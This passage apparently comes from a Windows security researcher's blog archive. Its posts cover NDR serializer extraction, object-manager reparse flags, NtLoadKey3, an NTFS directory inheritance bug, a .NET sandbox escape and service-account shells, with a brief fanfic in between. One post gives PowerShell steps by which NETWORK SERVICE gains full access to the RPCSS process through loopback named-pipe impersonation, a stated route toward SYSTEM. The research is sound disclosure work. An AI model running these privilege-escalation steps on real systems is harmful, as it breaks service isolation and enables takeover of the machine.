I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could have manually written the C# parser, but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. Fortunately I'd already written that feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializers.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), in which you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode, which serialize (encode) and deserialize (decode) a type to and from a byte stream. How you use these functions is not really important; we're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers.

If you look at the Decode function when compiled for an X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position. It can be used multiple times to encode or decode more than one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 syntax serializers. If you compile as 32-bit it will instead use the NdrMesType*2 APIs, which only support DCE. I'll mention what you need to parse the DCE-only APIs later, but most things you'll want to extract will have a 64-bit build, which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to write a parser for manually. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004, SHA1: 173767EDD6027F2E1C2BF5CFB97261D2C6A95969):

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType so that the structures are wrapped inside unique pointers. This is the default when using the real RPC runtime and, except for conformant structures, isn't strictly necessary; however, if you don't do this then decoding will typically fail, certainly in this case.

You might notice a serious issue with the generated code: there are no proper structure names. This is unavoidable; the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface, not only can you avoid having to work out the offsets, as Get-RpcServer will automatically find the location, you can also use an additional feature to extract type information from your private symbols and fix up the structure names.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold duplicate functions together and the type information will be lost; that's why we printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle calls to NdrMesType*2, in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's an offset into the format string (2 in this case) which you can pass instead of the address in memory. It depends on what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

OBJ_DONT_REPARSE is (mostly) Useless.

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well, that's not what you might expect; there should be no reparse points in the path to notepad, so what went wrong? You're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager, therefore just accessing a drive letter path using this Object Attribute flag fails. Still, this does mean it will also protect you from Registry symbolic links, as those also use a reparse point.
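To demonstrate, opening the same file via its native device path, which doesn't traverse any Object Manager symbolic links, works fine with the flag set (the volume number will vary between systems):

PS> $f = Get-NtFile \Device\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe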

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects, where encountering a symbolic link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying, especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK, which does what you'd want to avoid file system symbolic links, but it can only be used in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks anyway. It doesn't prevent abuse of shadow directories, for example, which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Silent Exploit Mitigations for the 1%

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problem with many of these mitigations is they're regularly undocumented, or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations is the pair of additional OBJECT_ATTRIBUTE flags, OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE, which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them after they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, the version naming is just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time: originally there was only NtLoadKey, then NtLoadKey2 was introduced, in XP I believe, to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross-hive symbolic link attacks (which is all j00ru's and Gynvael's fault). And now finally NtLoadKey3. I've no idea why the naming went to 2, then to Ex, then back to 3; maybe it's some new Microsoft counting system. NtLoadKeyEx is partially exposed through the Win32 RegLoadKey and RegLoadAppKey APIs, although they only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather than a Per-User Application Hive) is that you need SeRestorePrivilege* enabled on the caller's effective token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive, including the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue, as those hives are stored in an Administrator-only location (c:\windows\system32\config if you're curious), but sometimes hives are loaded from user-accessible locations, such as the user's profile or for Desktop Bridge support. In a user-accessible location you can use symbolic link tricks to force the log files to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554, as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

NtLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could probably have implemented this by adding a new flag which checks the caller's Primary Token for the privilege, like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation, obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made a best guess with the following:
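
(Remember this is my best guess; the structure layout, names and Type semantics below are assumptions, not official definitions.)

typedef struct _KEY_LOAD_HANDLE {
    ULONG Type;       // Selects what the handle represents; presumably the
                      // trust key or event from NtLoadKeyEx, and the token
                      // to impersonate for file creation.
    HANDLE Handle;
} KEY_LOAD_HANDLE, *PKEY_LOAD_HANDLE;

NTSTATUS NtLoadKey3(
    POBJECT_ATTRIBUTES TargetKey,     // Attachment point for the hive.
    POBJECT_ATTRIBUTES SourceFile,    // The hive file to load.
    ULONG Flags,
    PKEY_LOAD_HANDLE LoadEntries,     // Folded-up list of handles.
    ULONG LoadEntryCount,
    ACCESS_MASK DesiredAccess,
    PHANDLE RootHandle,
    PVOID Unknown                     // Also in NtLoadKeyEx, seemingly unused.
);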

Notice that the TrustKey and Event handles from NtLoadKeyEx have been folded up into a list of handle values. Perhaps someone wasn't sure whether, if they ever needed to extend the system call again, to go for NtLoadKey4 or NtLoadKeyExEx, so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx, is seemingly unused, or I'm just incapable of tracking down where it gets referenced. Process Hacker's header files claim it's an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if, in this new sharing and caring Microsoft, they, well, shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Writing Windows File System Drivers is Hard.

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security, but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edge cases pop up over time.

The issue in this case relates to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify inheritance rules through the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags determine whether an ACE on a parent directory should be inherited by a new child entry depending on whether that entry is a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug.
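
In simplified form the logic looks something like the following (my reconstruction, not the actual NTFS source; parameter plumbing elided):

// Simplified sketch of NTFS's default SD assignment on create.
BOOLEAN IsDirectoryObject = BooleanFlagOn(
    IrpSp->Parameters.Create.Options, FILE_DIRECTORY_FILE);

SeAssignSecurityEx(ParentSecurityDescriptor,
                   ExplicitSecurityDescriptor,   // NULL when inheriting.
                   &NewSecurityDescriptor,
                   NULL,                         // No object type GUID.
                   IsDirectoryObject,            // From the create options only.
                   SEF_DACL_AUTO_INHERIT | SEF_SACL_AUTO_INHERIT,
                   SubjectContext,
                   IoGetFileObjectGenericMapping(),
                   PagedPool);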

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter, which is set to TRUE if the FILE_DIRECTORY_FILE option flag was passed to NtCreateFile. That seems fine: you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, and if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is: if you create a directory using the $INDEX_ALLOCATION trick, the new SD will inherit as if it were a File rather than a Directory. We can verify this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs: one for the INTERACTIVE group which will inherit on a Directory, the other for NETWORK which will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly, probably not. The only scenario I could imagine would be if you could specify a path to a system service which creates a file in a location where inherited File access would grant access but inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly checked when determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why the design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox: I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this had always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the takeaway is that at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized that it's almost certainly (mostly) my fault that the .NET Framework has this feature, so I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call and the function the delegate calls is Trusted, we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which we can attach to something such as a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about lambda functions, so could we use something like this?

EventHandler f = (o, e) => File.OpenRead(@"C:\SomePath");

Unfortunately not: the C# compiler takes the lambda and generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o, e) => File.OpenRead(@"C:\SomePath");
EventHandler f = lambda.Compile();

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides that rather than create a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted, as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (it was a Security Transparent function), but it wouldn't block the Stack Walk either. This allows us to implement an arbitrary Delegate adapter to convert one Delegate call-site into calling any other API, as long as it's invoked under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with an expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later: the aforementioned Secure Delegates.

Silverlight always had Secure Delegates: it would capture the current CAS permission set on the stack when creating them and, if needed, add a trampoline to the delegate to insert an Untrusted Stack Frame into the call. It seems this was later added to .NET. The reason serialization is blocked is that when the Delegate gets serialized this trampoline gets lost, so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including JavaScript engines such as V8 or JSCore.


Sharing a Logon Session a Little Too Much

The Logon Session on Windows is tied to a single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there can be multiple different Tokens all identifying the same logon session, each with different service groups etc. This blog post demonstrates a case where this sharing of the logon session between multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it: when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed: network authentication. If you look at the prototype of AcquireCredentialsHandle, where you specify the user to use for network authentication, you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? Well, if you have TCB privilege when doing network authentication, this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine, as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter, as it means the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.
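
To make that concrete, here's a rough sketch of how the parameter would be used (my illustration, assuming the caller holds TCB privilege):

#include <windows.h>
#define SECURITY_WIN32
#include <security.h>

// Acquire outbound credentials for another logon session. LogonId is the
// target session's Authentication ID; the pvLogonID parameter is only
// honoured if the caller has TCB privilege. Link against secur32.lib.
SECURITY_STATUS AcquireSessionCreds(LUID LogonId, PCredHandle Cred) {
    TimeStamp expiry;
    return AcquireCredentialsHandleW(
        NULL,                     // Principal.
        (LPWSTR)L"Negotiate",     // Security package.
        SECPKG_CRED_OUTBOUND,
        &LogonId,                 // pvLogonID - the parameter of interest.
        NULL, NULL, NULL,
        Cred, &expiry);
}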

Of course if you have TCB you can do almost whatever you like, so why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives SMB supports which allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909; results might vary. First you'll need a PowerShell process running as NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though, so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process? It also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that; let's try to open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loopback authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first Token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation Token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service, so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

Taking a joke a little too far.

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Getting an Interactive Service Account Shell

Sometimes you want to manually interact with a shell running as a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts; however, you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something failed during initialization. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control of the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain: the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc. for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID; the low-privileged service accounts are not so lucky.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable; miss one resource and it might still not work, or it might fail at some indeterminate time. Instead we do what the OS does: we create the service token with the Logon Session SID, which will grant us access to the session's resources.

First create a SYSTEM PowerShell process on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS> $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whoami and showing the user as Local Service.



DLL Import Redirection in Windows 10 1909

